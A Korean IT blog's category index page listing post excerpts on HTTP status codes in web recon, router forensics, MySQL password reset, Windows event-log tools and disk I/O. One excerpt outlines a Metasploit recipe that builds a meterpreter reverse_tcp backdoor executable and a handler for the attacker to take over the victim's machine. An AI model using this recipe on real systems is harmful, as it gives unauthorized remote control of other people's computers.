목록IT (650)

선 밖에 선 자유인

웹 애플리케이션 주요 응답 코드 가이드

- 302 Found : 어떤 페이지에서 로그인 페이지로 자동 redirect 한다면 인증된 사용자들에 의해서만 접근 가능할 확률 높음다른 페이지로 redirect 되는 경우 애플리케이션 로직에 대해 추가 조사 필요 - 400 Bad Request :애플리케이션에저 지정해 둔 디렉터리나 파일명을 URL 내에서 쓰는 원칙 등을 요청 값에서 맞추어 주지 못한 경우일 수 있음.Brute Force 공격에 사용된 단어 목록에 숨은 문자가 있거나 문제가 있는 경우 - 401 Unauthorized or 403 Forbidden : 요청된 리소스가 존재하나 인증 여부나 권한 여부에 관계없이 어떤 사용자에 의해서는 접근 불가를 가리킨다.해당 디렉토리가 존재하는 것으로 추측 가능 - 500 internal Server..
IT/Security 2013. 9. 13. 13:52
프로세스 별 Disk I/O 확인 방법

[root@x2lab ~]# pidstat -d -p ALL PID kB_rd/s kB_wr/s kB_ccwr/s Commandv 1 0.02 0.09 0.01 initv 2 0.00 0.00 0.00 kthreaddv 3 0.00 0.00 0.00 migration/0v 4 0.00 0.00 0.00 ksoftirqd/0v 5 0.00 0.00 0.00 migration/0v 6 0.00 0.00 0.00 watchdog/0v 7 0.00 0.00 0.00 migration/1 요런 식으로 나옴
IT/System & Network 2013. 9. 6. 09:54
라우터 포렌식 - 정보수집

- 휘발성 정보 수집router# show clockrouter# show versionrouter# show usersrouter# show access-listsrouter# show ip routerouter# show arprouter# show stacks (crash 의 원인을 찾아낸다.) * 시스테 IOS 11.2 부터는 show tech-support 명령어를 통해 한꺼번에 보여준다. 아래의 내용들이 포함됨router# show versionrouter# show running-configrouter# show stacksrouter# show interfacerouter# show controllerrouter# show process cpurouter# show process memor..
IT/Security 2013. 9. 5. 15:49
MySQL 패스워드 복구

/etc/init.d/mysqld stop or kill 을 이용하여 mysql 프로세스 모두 종료 후 /mysqld_safe --skip-grant-tables & # mysqlmysql> update user set ...
IT/Data 2013. 8. 27. 14:56
wevutil 옵션

windows vista 이상 이벤트 로그 검색 tool wevtutil 옵션 정리 http://technet.microsoft.com/en-us/library/cc732848.aspx Syntaxwevtutil [{el | enum-logs}] [{gl | get-log} [/f:]] [{sl | set-log} [/e:] [/i:] [/lfn:] [/rt:] [/ab:] [/ms:] [/l:] [/k:] [/ca:] [/c:]] [{ep | enum-publishers}] [{gp | get-publisher} [/ge:] [/gm:] [/f:]] [{im | install-manifest} ] [{um | uninstall-manifest} ] [{qe | query-events} [/lf:] [/..
IT/System & Network 2013. 8. 27. 13:48
Metasploit meterpreter를 이용한 침투

- 리소스 파일 생성 (attacker_.rc)use exploit/multi/handlerset PAYLOAD windows/meterpreter/reverse_tcpset LHOST set ExitSession falseexploit -j -z - reverse_tcp 백도어 생성msfpayload windows/meterpreter/reverse_tcp LHOST= X > reverse_tcp.exe - 공격자 pc에서 리소스 실행msfconsole -r attacker_.rc - 사용자가 백도어를 실행하게 되면 reverse_tcp connection 연결 - 공격자는 sessions -i 를 통해 meterpreter 조작 가능
IT/Security 2013. 8. 23. 17:19
윈도 XP, 2003 에서 이벤트 로그 CMD 작업

윈도 7, 2008 이상에서는 wevtutil 을 이용하여 검색이 되지만 이전 버전에서는 지원되지 않음이벤트 로그 검색 스크립트인 eventquery.vbs 를 사용한다. 아래와 같이 cscript 를 이용하여 경로를 지정해 주어야 한다.CSCRIPT C:\WINDOWS\System32\EVENTQUERY.vbs EVENTQUERY.vbs [/S system [/U username [/P password]]] [/FI filter] [/FO format] [/R range] [/NH] [/V] [/L logname | *]설명: EventQuery.vbs 스크립트는 관리자가 하나 이상의 이벤트 로그의 이벤트 및 이벤트 속성을 나열할 수 있도록 합니다.매개 변수 목록: /S system 연결할 원격 시스템..
IT/Security 2013. 8. 22. 15:16
Hex Ascii Converter

Hex To ASCII Converter Hex: 41:6e:74:6f:6e:20:69:73:20:67:72:65:61:74:20:3a:29 Ascii:
IT/Security 2013. 8. 21. 09:54
Prev 1 ··· 67 68 69 70 71 72 73 ··· 82 Next